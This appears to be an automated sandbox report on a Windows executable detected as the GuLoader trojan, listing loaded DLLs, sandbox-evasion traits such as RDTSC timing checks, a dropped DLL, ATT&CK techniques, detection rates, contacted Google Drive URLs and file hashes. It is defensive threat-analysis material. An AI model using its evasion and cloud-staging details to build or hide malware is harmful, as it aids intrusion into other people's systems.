      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Arder.lnk.0.dr | LNK file: ..\Users\user\Disannex.And37
      Source: Osb7hkGfAb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb | source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP | source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      Source: Yara match | File source: 00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_700E1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_700E2F60 push eax; ret 0_2_700E2F8E
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File created: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API/Special instruction interceptor: Address: 32B3683
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API/Special instruction interceptor: Address: 2063683
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe RDTSC instruction interceptor: First address: 328CD06 second address: 328CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD5A0E88B36h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe RDTSC instruction interceptor: First address: 203CD06 second address: 203CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD5A0EA9ED6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe TID: 3540 Thread sleep time: -80000s >= -30000s
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040646B FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_004027A1 FindFirstFileA
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpk
Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2828161142.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2839598749.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584587395.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2595591638.0000000002DFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API call chain: ExitProcess graph end node (graph_0-3944)
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API call chain: ExitProcess graph end node (graph_0-4120)
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_700E1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
MITRE ATT&CK matrix, one row per tactic (numbers in parentheses are the counts shown in the report next to the technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (1); File and Directory Discovery (2); System Information Discovery (23); Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
Osb7hkGfAb.exe | 75% | ReversingLabs | Win32.Trojan.GuLoader
Osb7hkGfAb.exe | 68% | Virustotal |
Osb7hkGfAb.exe | 100% | Avira | TR/Injector.ofxme

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://www.googletagmanager.co | 0% | Avira URL Cloud | safe
http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
https://drive.go | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.238 | true | false | | high
drive.usercontent.google.com | 142.250.186.97 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.googletagmanager.co | Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://translate.google.com/translate_a/element.js | Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/6 | Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/r | Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/lR | Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ftp.ftp://ftp.gopher. | Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/ | Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/Z | Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/xq3 | Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Osb7hkGfAb.exe | false | | high
https://drive.go | Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/B | Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ogle.co.jp | Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | Osb7hkGfAb.exe | false | | high
https://drive.google.com/ | Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Osb7hkGfAb.exe, 00000006.00000001.2123046241.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
https://drive.google.com/0h | Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://apis.google.com | Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/_1 | Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ificate | Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/th | Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/#/b | Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587621
Start date and time: 2025-01-10 15:59:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Osb7hkGfAb.exe (renamed because the original name is a hash value)
Original Sample Name: ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
Detection: MAL
Classification: mal76.troj.evad.winEXE@3/8@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 46
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
Match: 37f463bf4616ecd445d4a1937da06e19

Associated Sample Name / URL | Detection | Threat Name | Context
SvmL9tW29w.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
fTSt7dc60O.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
vq6jxdGvD6.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
Ub46mg9pn4.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
fTSt7dc60O.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
nRNzqQOQwk.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
You7ynHizy.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
Xjz8dblHDe.exe | malicious | GuLoader | 142.250.186.97, 142.250.184.238
zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit | 142.250.186.97, 142.250.184.238
Match: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll

Associated Sample Name / URL | Detection | Threat Name
SvmL9tW29w.exe | malicious | GuLoader
fbXZ4ErQMU.exe | malicious | GuLoader
fbXZ4ErQMU.exe | malicious | Unknown
dIPYIbWXs1.exe | malicious | Unknown
dIPYIbWXs1.exe | malicious | GuLoader
eAvqHiIsgR.exe | malicious | GuLoader
eAvqHiIsgR.exe | malicious | GuLoader
RFQ-24064562-SUPPLY-NOv-ORDER.com.exe | malicious | Remcos, GuLoader
LkzvfB4VFj.exe | malicious | FormBook, GuLoader
Process: C:\Users\user\Desktop\Osb7hkGfAb.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.854450882766351
Encrypted: false
SSDEEP: 192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
MD5: 34442E1E0C2870341DF55E1B7B3CCCDC
SHA1: 99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
SHA-256: 269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
SHA-512: 4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SvmL9tW29w.exe, Detection: malicious
• Filename: fbXZ4ErQMU.exe, Detection: malicious
• Filename: fbXZ4ErQMU.exe, Detection: malicious
• Filename: dIPYIbWXs1.exe, Detection: malicious
• Filename: dIPYIbWXs1.exe, Detection: malicious
• Filename: eAvqHiIsgR.exe, Detection: malicious
• Filename: eAvqHiIsgR.exe, Detection: malicious
• Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious
• Filename: LkzvfB4VFj.exe, Detection: malicious
Reputation: moderate, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):210620
                                                                        Entropy (8bit):7.5479608224177
                                                                        Encrypted:false
